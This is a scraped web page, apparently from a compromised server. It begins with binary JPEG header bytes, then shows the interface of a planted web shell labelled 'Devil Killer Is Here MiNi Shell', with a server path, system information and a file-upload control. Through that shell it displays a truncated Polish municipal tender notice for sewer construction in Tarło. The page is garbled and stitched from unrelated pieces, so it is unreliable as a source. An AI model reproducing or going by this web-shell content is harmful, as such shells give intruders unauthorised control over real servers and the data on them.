JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211208/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211208/0030547701-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Budowa kanalizacji sanitarnej w miejscowości Tarło –II etap </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Niedźwiada</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 431019537</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Niedźwiada-Kolonia 43</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Niedźwiada</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-104</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL814 - Lubelski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">poczta@niedzwiada.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://ugniedzwiada.bip.lubelskie.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa kanalizacji sanitarnej w miejscowości Tarło –II etap </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-f846e320-5817-11ec-8c2d-66c2f1230e9c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00305477</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-12-08</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002944/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.6 Budowa kanalizacji sanitarnej w miejscowości Tarło –II etap</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://miniportal.uzp.gov.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa się przy użyciu miniPortalu,<br/>który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,ePUAPu, dostępnego pod adresem:<br/>https://epuap.gov.pl/wps/portal oraz poczty elektronicznej</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W<br/>postępowaniu o udzielenie zamówienia komunikacja między Zamawiającym a Wykonawcami odbywa<br/>się przy użyciu miniPortalu, który dostępny jest pod adresem: https://miniportal.uzp.gov.pl/,ePUAPu,<br/>dostępnego pod adresem: https://epuap.gov.pl/wps/portal oraz poczty elektronicznej.<br/>2. Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego, musi<br/>posiadać konto na ePUAP. Wykonawca posiadający konto na ePUAP ma dostęp do następujących<br/>formularzy: „Formularz do złożenia, zmiany, wycofania oferty lub wniosku&#34; oraz do „Formularza do<br/>komunikacji&#34;.<br/>3. Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu<br/>opisane zostały w Regulaminie korzystania z systemu miniPortal oraz Warunkach korzystania z<br/>elektronicznej platformy usług administracji publicznej (ePUAP).<br/>4. Specyfikacja połączenia, formatu przesyłanych danych oraz kodowania i oznaczania czasu<br/>odbioru danych:<br/>- specyfikacja połączenia formularze udostępnione są za pomocą protokołu TLS 1.2, - format danych<br/>oraz kodowanie miniPortal - Formularze dostępne są w formacie HTML z kodowaniem<br/>UTF-8,<br/>- oznaczenia czasu odbioru danych - miniPortal - wszelkie operacje opierają się o czas<br/>serwera i dane zapisywane są z dokładnością co do setnej części sekundy,<br/>- integracja z systemem ePUAP jest wykonana w wykorzystaniem standardowego<br/>mechanizmu ePUAP. W przypadku Wykonawcy wysyłającego wniosek do Zamawiającego,<br/>ESP Zamawiającego automatycznie generuje Rodzaj Urzędowego Poświadczenia Odbioru,<br/>czyli Urzędowe Poświadczenie Przedłożenia (UPP), które jest powiązane z wysyłanym<br/>dokumentem. W UPP w sekcji „Dane poświadczenia&#34; jest zawarta informacja o dacie<br/>doręczenia.<br/>System dostępny jest za pośrednictwem następujących przeglądarek internetowych:<br/>- Microsoft Internet Explorer od wersji 11.0,<br/>- Mozilla Firefox od wersji 15,<br/>- Google Chrome od wersji 20,<br/>- Microsoft Edge.<br/>5. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych formularzy: „Formularz<br/>złożenia, zmiany, wycofania oferty lub wniosku&#34; i „Formularza do komunikacji&#34; wynosi 150 MB.<br/>6. Za datę przekazania oferty, wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub<br/>elektronicznych kopii dokumentów lub oświadczeń oraz innych informacji przyjmuje się datę ich<br/>przekazania na ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zamawiający udostępnia dane osobowe, o których mowa<br/>w art. 10 rozporządzenia 2016/679, w celu umożliwienia korzystania ze środków ochrony prawnej, o<br/>których mowa w dziale IX, do upływu terminu na ich wniesienie.<br/>2. Skorzystanie przez osobę, której dane osobowe dotyczą, z uprawnienia do sprostowania lub<br/>uzupełnienia, o którym mowa w art. 16rozporządzenia 2016/679, nie może skutkować zmianą wyniku<br/>postępowania o udzielenie zamówienia ani zmianą postanowień umowy w sprawie zamówienia<br/>publicznego w zakresie niezgodnym z ustawą.<br/>3. Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia<br/>2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.<br/>4. W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1<br/>rozporządzenia 2016/679, spowoduje ograniczenie przetwarzania danych osobowych zawartych w<br/>protokole postępowania lub załącznikach do tego protokołu, od dnia zakończenia postępowania o<br/>udzielenie zamówienia Zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art.18ust.2rozporządzenia 2016/679.<br/>5.Ograniczenia zasady jawności, o których mowa w ust. 3 i art. 18 ust. 3-6 Pzp, stosuje się<br/>odpowiednio.<br/>6. W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego,<br/>z uprawnienia, o którym mowa w art. 15 ust. 1-3 rozporządzenia 2016/679,<br/>Z amawiający może żądać od osoby występującej z żądaniem wskazania dodatkowych informacji,<br/>mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie<br/>zamówienia.<br/>7.Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie<br/>może naruszać integralności protokołu postępowania oraz jego załączników.<br/>8.W postępowaniu są przetwarzane dane osobowe podlegające ochronie zgodnie z przepisami ustawy<br/>z dnia 10 maja 2018 r. o ochronie danych osobowych oraz rozporządzenia 2016/679. Dane te mogą<br/>dotyczyć w szczególności samego Wykonawcy (osoby fizycznej prowadzącej działalność<br/>gospodarczą), jego pełnomocnika (osoby fizycznej), jak też informacji o osobach, które w swojej ofercie<br/>Wykonawca przedkłada celem wykazania spełniania warunków udziału w postępowaniu, braku<br/>podstaw do wykluczenia z postępowania, jak i potwierdzenia wymogów Zamawiającego dotyczących<br/>wykonania przedmiotu zamówienia.<br/>9.W postępowaniu i po zakończeniu postępowania do przetwarzania danych osobowych osób<br/>fizycznych stosuje się przepisy ustawy z dnia 10 maja 2018 r. o ochronie danych osobowych oraz<br/>rozporządzenia 2016/679.<br/>10. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia 2016/679,Zamawiający informuje, że:<br/>10.1. administratorem danych osobowych osób fizycznych jest Wójt Gminy Niedźwiada;<br/>10.2. Zamawiający wyznaczył Inspektora Ochrony Danych, z którym można się skontaktować pocztą<br/>elektroniczną na adres inspektor@cbi24.pl;<br/>10.3. dane osobowe osób fizycznych przetwarzane będą na podstawie art.6 ust.1 lit. c rozporządzenia<br/>2016/679 w celu związanym z postępowaniem o udzielenie zamówienia publicznego na „Budowę<br/>kanalizacji sanitarnej w miejscowości Tarło –II etap”.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">10.4. w odniesieniu do danych osobowych osób fizycznych<br/>decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 rozporządzenia<br/>2016/679;<br/>10.5.osoba fizyczna posiada:<br/>10.5.1 na podstawie art.15 rozporządzenia 2016/679 prawo dostępu do danych osobowych jej<br/>dotyczących;<br/>10.5.2 na podstawie art.16 rozporządzenia 2016/679 prawo do sprostowania swoich danych<br/>osobowych;<br/>10.5.3 na podstawie art. 18 rozporządzenia 2016/679 prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust.<br/>2rozporządzenia 2016/679;<br/>10.5.4 prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy osoba<br/>fizyczna uzna, że przetwarzanie danych osobowych jej dotyczących narusza przepisy rozporządzenia<br/>2016/679;<br/>10.6. osobie fizycznej nie przysługuje:<br/>10.6.1. w związku zart.17 ust.3 lit. b, d lub e rozporządzenia 2016/679 prawo do usunięcia danych<br/>osobowych;<br/>10.6.2. prawo do przenoszenia danych osobowych, o którym mowa w art.20 rozporządzenia 2016/679;<br/>10.6.3. na podstawie art.21 rozporządzenia 2016/679 prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania danych osobowych osób fizycznych jest art. 6 ust.1<br/>lit. c rozporządzenia 2016/679.<br/>11. Wykonawca ubiegając się o udzielenie zamówienia publicznego jest zobowiązany do wypełnienia<br/>wszystkich obowiązków formalno-prawnych związanych z udziałem w<br/>postępowaniu, w tym również obowiązków wynikających z rozporządzenia 2016/679, w szczególności<br/>obowiązek informacyjny przewidziany w art. 13 rozporządzenia 2016/679 względem osób fizycznych,<br/>których dane osobowe dotyczą i od których dane te Wykonawca bezpośrednio pozyskał. Obowiązek<br/>informacyjny wynikający z art. 13 rozporządzenia 2016/679 nie będzie miał zastosowania, gdy i w<br/>zakresie, w jakim osoba fizyczna, której dane dotyczą, dysponuje już tymi informacjami (art. 13 ust. 4<br/>rozporządzenia 2016/679).<br/>12. Wykonawca jest obowiązany wypełnić obowiązek informacyjny wynikający z art. 14 rozporządzenia<br/>2016/679 względem osób fizycznych, których dane przekazuje Zamawiającemu i<br/>których dane pośrednio pozyskał, chyba że ma zastosowanie co najmniej jedno z włączeń, o których<br/>mowa w art.14 ust. 5 rozporządzenia 2016/679.<br/>13. W celu zapewnienia, że Wykonawca wypełnił obowiązki informacyjne wynikające z rozporządzenia<br/>2016/679 oraz ochrony prawnie uzasadnionych interesów osoby trzeciej, której dane zostały<br/>przekazane w związku z ubieganiem się Wykonawcy o udzielenie zamówienia w postępowaniu,<br/>Wykonawca składa w postępowaniu oświadczenie o wypełnieniu przez niego obowiązków<br/>informacyjnych przewidzianych w art. 13 lub art. 14 rozporządzenia 2016/679. Oświadczenie, o którym<br/>mowa w zdaniu pierwszym Wykonawca składa w ofercie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RL.271.17.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest &#34;Budowa kanalizacji sanitarnej w miejscowości Tarło - II etap&#34;.<br/>Zakres robót przewidzianych do realizacji w II etapie obejmuje:<br/>- wykonanie przepompowni ścieków oznaczonych w projekcie budowlanym jako P2, P3 i P4 w zbiorniku z polimerobetonu Dn 1200mm. Przepompownia ścieków, ma być włączona do istniejącego systemu monitoringu i wizualizacji funkcjonującego w gminie Niedźwiada , którego producentem jest Hydropartner Leszno,<br/>- wykonanie rurociągu tłocznego od przepompowni do istniejącej kanalizacji wykonanej w ramach etapu I, z rur ciśnieniowych PE 100 RC o średnicy 90 mm,<br/>- wykonanie kolektorów grawitacyjnych w zakresie średnic Dn 160 mm – 200 mm z rur litych o ściankach obustronnie gładkich (nie dopuszcza się stosowania rur karbowanych ani spienionych) – wykonanych z jednorodnego materiału bez dodatków innych tworzyw sztucznych i studzienek rewizyjnych na odcinkach (numeracja studni i rysunków wg projektu wykonawczego):<br/>- S2 – SR3, S12 – S124,<br/>- P3 – SR2, S19 – S198,<br/>- P2 – S203, S20 – S32, S26 – S262, S29 – S292,<br/>- P4 – S548 P4 – S513,<br/>- S101A – S111,<br/>wraz ze studniami i kolektorami podrzędnymi.<br/>Uwaga nie należy wyceniać robót budowlanych związanych z przejściem kanalizacji pod torami i odciek do kościoła. ( odcinek od studni S101 do S111).<br/>Na szczegółowy opis przedmiotu zamówienia, stanowiący załącznik Nr 1 do SWZ, opisujący zakres wykonywanych robót będących przedmiotem zamówienia składają się:<br/>-	Projekt budowlany,<br/>-	Projekt budowlano-wykonawczy,<br/>-	Specyfikacje techniczne wykonania i odbioru robót budowlanych (STWiOR),<br/>-	Przedmiar robót. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45000000-7 - Roboty budowlane</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45111240-2 - Roboty w zakresie odwadniania gruntu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <p class="mb-0">45231300-8 - Roboty budowlane w zakresie budowy wodociągów i rurociągów do odprowadzania ścieków</p> <p class="mb-0">45232431-2 - Przepompownie wody odpadowej</p> <p class="mb-0">45233127-5 - Roboty budowlane w zakresie rozjazdów</p> <p class="mb-0">45330000-9 - Roboty instalacyjne wodno-kanalizacyjne i sanitarne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane: <span class="normal">Zamawiający przewiduje możliwości udzielenia zamówień, o których mowa w art. 214<br/>ust. 1 pkt 7 w zw. z art. 305 pkt 1 ustawy Pzp w wysokości do 10% wartości zamówienia<br/>podstawowego</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający dokona oceny ofert według następujących kryteriów i ich<br/>wag:<br/>a) „Cena&#34; (C) - 60 pkt;<br/>b) „Okres gwarancji i rękojmi &#34; (G): 40 pkt;<br/>2. W trakcie oceny kolejno ocenianym ofertom zostaną przyznane punkty:<br/>2.1. w kryterium „Cena&#34; (C) wg poniższego wzoru:<br/>cena najniższa<br/>C = ---------------------------------- x 100 pkt x znaczenie kryterium 60 %<br/>cena oferty ocenianej<br/>Punkty będą obliczane z dokładnością do dwóch miejsc po przecinku.<br/>2.2. Sposób przyznania punktów w kryterium „Okres gwarancji”:<br/>gwarancja i rękojmia oferty ocenianej<br/>G = ---------------------------------------------------------- x 100 pkt x znaczenie kryterium 40 %<br/>najdłuższa zaoferowana gwarancja i rękojmia powyżej 36 m-cy<br/>Powyższy wzór nie będzie obowiązywał w przypadku zaoferowania przez Wykonawcę okresu<br/>gwarancji i rękojmi w wymiarze 36 miesięcy liczonych od dnia bezusterkowego odbioru końcowego<br/>przedmiotu umowy (termin minimalny). Zaoferowanie okresu gwarancji poniżej 36 m-cy skutkować<br/>będzie odrzuceniem oferty.<br/>Jeżeli Wykonawca w swojej ofercie, zaproponuje okres gwarancji dłuższy niż 60 miesięcy, do oceny<br/>ofert w kryterium „Okres gwarancji i rękojmi” zostanie mu policzony okres 60 miesięcy jako<br/>maksymalny zgodny z żądaniem i możliwościami Zamawiającego.<br/>Całkowita liczba punktów (K), jaką otrzyma dana oferta, zostanie obliczona będzie wg wzoru: K = C+G</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium kosztu oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Koszt</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji i rękojmi</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> sytuacji ekonomicznej lub finansowej : <br/><br/>Zamawiający określa, że ww. warunek zostanie spełniony, jeśli Wykonawca wykaże, że posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż 1 000 000,00 zł (słownie: jeden milion złotych).<br/> <br/>zdolności technicznej lub zawodowej:<br/>- Wykonawca spełni warunek udziału w postępowaniu dotyczący zdolności zawodowej, jeżeli wykaże, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonywał minimum jedną robotę budowlaną* polegającą na budowie, rozbudowie lub przebudowie sieci kanalizacji sanitarnej lub deszczowej Zamawiający dopuszcza również wykonanie kanalizacji deszczowej i sanitarnej w ramach jednego zadania o wartość minimum 1 000 000,00 (słownie: jeden milion złotych) zł brutto - z podaniem jej wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których roboty budowlane zostały wykonane wraz z dowodami określającymi, że te roboty budowlane zostały wykonane należycie (referencje, protokoły bezusterkowych odbiorów końcowych prac).<br/>*za wykonaną robotę budowlaną Zamawiający rozumie taką robotę, która została zrealizowana na rzecz podmiotu (Zamawiającego/Odbiorcy) w ramach jednej umowy i odebrana przez ten podmiot, jako wykonana należycie oraz zgodnie z przepisami prawa budowlanego i prawidłowo ukończona. Zamawiający zastrzega sobie prawo do ewentualnego sprawdzenia prawdziwości przedstawianych danych, które będą wyszczególnione w ofercie.<br/>-Wykonawca spełni warunek udziału w postępowaniu dotyczący potencjału osobowego, jeżeli wykaże, że dysponuje osobami posiadającymi kwalifikacje zawodowe, przy czym Zamawiający dopuszcza łączenie funkcji co najmniej jedną osobą z uprawnieniami budowlanymi do kierowania robotami w zakresie instalacyjnej sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych bez ograniczeń. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">sytuacji ekonomicznej lub finansowej<br/> <br/>W celu potwierdzenia spełniania warunków udziału w postępowaniu wykonawca na wezwanie zamawiającego przedstawi dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej 